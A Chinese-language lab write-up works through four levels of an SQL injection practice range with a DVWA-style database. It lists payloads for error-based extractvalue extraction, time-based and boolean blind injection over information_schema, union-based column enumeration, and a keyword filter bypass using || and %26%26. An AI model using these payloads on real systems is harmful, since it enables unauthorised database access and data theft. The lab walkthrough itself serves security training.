【sql注入】sql关卡1~4

前言: 靶场自取

level-1

测试注入点

POC: 1,1',1'',1"",1/1,1/0

==》存在注入点

爆破

POC: id=-1'+and+extractvalue(1,concat(0x7e,user(),0x7e))--+

level-2

尝试注入点

POC1:admin'

POC2:admin''

POC3:admin''+and+sleep(3)--+

POC4: admin'+and+if(1,1,0)=0--+

POC5: admin'+and+if(1,1,0)=1--+

==》
POC1,POC2没有反应
POC3存在延时输出,存在休眠盲注
POC4、POC5存在content-length周期变化,存在布尔盲注

爆破

尝试盲注

  • step1: 爆破数据库名

    ==》 数据库长度为4

  • step2: 获取数据库每个字符

    ==》 database: dvwa

    同理得到用户名:root@localhost

    ==》爆出表名

    POC:id=admin'+and+if(substr(concat(0x7e,(select+(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database())),0x7e),§1§,1)='§a§',1,0)--+

    ==》得到表名:guestbook,users

level-3

测试注入点

利用1,1',1",1/1,1/2

===》

a. 存在注入点

b. 注入点是表名,猜想sql语句为select * from '$id$ where user_id='1' LIMIT 0,1

爆破

POC=id=(select(extractValue(1,concat(0x7e,(select+(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database())),0x7e))))as+a--+

  1. 尝试表名

  2. 尝试爆破其他字段

  • 方式一:union方式

    • step1: 获取列数(二分法)

      POC1: id=users+order+by 10 //不回显

      POC2: id=users+order+by 5 //回显

      POC3: id=users+order+by 7 //回显

      POC4: id=users+order+by 8 //回显

      POC5: id=users+order+by 9 //不回显
      ===》 8列

    • step2: 获取回显位

      POC: id=users+where+user_id=-1+union+select+1,2,3,4,5,6,7,8--+

      注意这里需要手动构造where user_id=-1 ==》 回显位:4,5

    • step 3: 爆破数据

      • 爆破用户名、数据库
        POC: id=users+where+user_id=-1+union+select+1,2,3,user(),database(),6,7,8--+
  • 方式二:报错函数方式

    • 爆破用户名
      POC: id=(select(extractvalue(1,concat(0x7e,user()))))as+a--+
    • 爆出数据库
      POC: id=(select(extractvalue(1,concat(0x7e,database()))))as+a--+

level-4

测试注入点

POC: 1'、1"、1""、1/0、1/1,sleep

==》 id=1存在注入

爆破

  • POC: id=1'+and+extractvalue(1,concat(0x7e,user(),0x7e))--+

==》and被转移为_了

  • 尝试使用||代替and。
    POC: id=1'+||+extractvalue(1,concat(0x7e,user(),0x7e))--+

==》成功爆破

  • 尝试%26代替
    POC: id=1'%26%26+extractvalue(1,concat(0x7e,user(),0x7e))--+

    ==》成功爆破
相关推荐
银发控、2 小时前
MySQL联合索引
数据库·mysql
予枫的编程笔记2 小时前
【MySQL修炼篇】从踩坑到精通:事务隔离级别的3大异常(脏读/幻读/不可重复读)解决方案
数据库·mysql·后端开发·数据库事务·事务隔离级别·rr级别·脏读幻读不可重复读
一起养小猫4 小时前
Flutter for OpenHarmony 实战:记账应用数据统计与可视化
开发语言·jvm·数据库·flutter·信息可视化·harmonyos
世界尽头与你4 小时前
(修复方案)CVE-2023-22047: Oracle PeopleSoft Enterprise PeopleTools 未授权访问漏洞
数据库·安全·oracle·渗透测试
韩立学长4 小时前
【开题答辩实录分享】以《智能大学宿舍管理系统的设计与实现》为例进行选题答辩实录分享
数据库·spring boot·后端
Henry Zhu1234 小时前
数据库(五):反规范化
数据库
Mr_Xuhhh4 小时前
MySQL函数详解:日期、字符串、数学及其他常用函数
java·数据库·sql
he___H5 小时前
Redis高级数据类型
数据库·redis·缓存
霖霖总总5 小时前
[小技巧60]深入解析 MySQL Online DDL:MySQL Online DDL、pt-osc 与 gh-ost 机制与最佳实践
数据库·mysql
爱学习的阿磊6 小时前
使用PyTorch构建你的第一个神经网络
jvm·数据库·python